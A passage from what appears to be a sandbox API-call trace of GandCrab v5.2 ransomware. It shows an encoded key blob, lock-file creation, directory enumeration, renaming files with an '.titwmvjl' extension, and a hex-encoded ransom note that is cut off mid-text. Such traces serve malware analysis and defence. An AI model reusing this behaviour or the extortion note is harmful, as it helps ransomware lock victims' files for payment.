1\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.312] WriteFile (in: hFile=0x230, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f508, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f508*=0x2162, lpOverlapped=0x0) returned 1 [0096.313] CloseHandle (hObject=0x230) returned 1 [0096.313] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.313] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.313] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x275)) [0096.313] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.313] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.313] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.313] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\Cookies\\d2ca4a09d2ca4deb61a.lock") returned 49 [0096.314] CreateFileW (lpFileName="C:\\Users\\Default\\Cookies\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\cookies\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x230 [0096.314] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.314] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.314] lstrlenW (lpString="C:\\Users\\Default\\Cookies\\") returned 25 [0096.315] lstrcatW (in: lpString1="C:\\Users\\Default\\Cookies\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Cookies\\*") returned="C:\\Users\\Default\\Cookies\\*" [0096.315] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\Cookies\\*", fInfoLevelId=0x1, lpFindFileData=0x259f524, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.315] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Cookies\\*", lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 0xffffffff [0096.315] CloseHandle (hObject=0x230) returned 1 [0096.315] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.315] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.315] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.315] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\d2ca4a09d2ca4deb61a.lock" [0096.315] lstrlenW (lpString=".titwmvjl") returned 9 [0096.315] lstrlenW (lpString="C:\\Users\\Default\\d2ca4a09d2ca4deb61a.lock") returned 41 [0096.315] VirtualAlloc (lpAddress=0x0, dwSize=0x92, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.315] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 50 [0096.315] lstrlenW (lpString="C:\\Users\\Default\\d2ca4a09d2ca4deb61a.lock") returned 41 [0096.315] lstrlenW (lpString=".lock") returned 5 [0096.315] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.315] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.316] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.316] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.316] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.316] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0096.316] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0096.316] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="Desktop" | out: lpString1="C:\\Users\\Default\\Desktop") returned="C:\\Users\\Default\\Desktop" [0096.316] lstrcatW (in: lpString1="C:\\Users\\Default\\Desktop", lpString2="\\" | out: lpString1="C:\\Users\\Default\\Desktop\\") returned="C:\\Users\\Default\\Desktop\\" [0096.316] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.316] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.316] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.316] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.317] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.317] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.317] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.317] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.317] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.317] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.317] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.317] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\Desktop\\\\TITWMVJL-DECRYPT.txt") returned 46 [0096.317] CreateFileW (lpFileName="C:\\Users\\Default\\Desktop\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\desktop\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.318] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\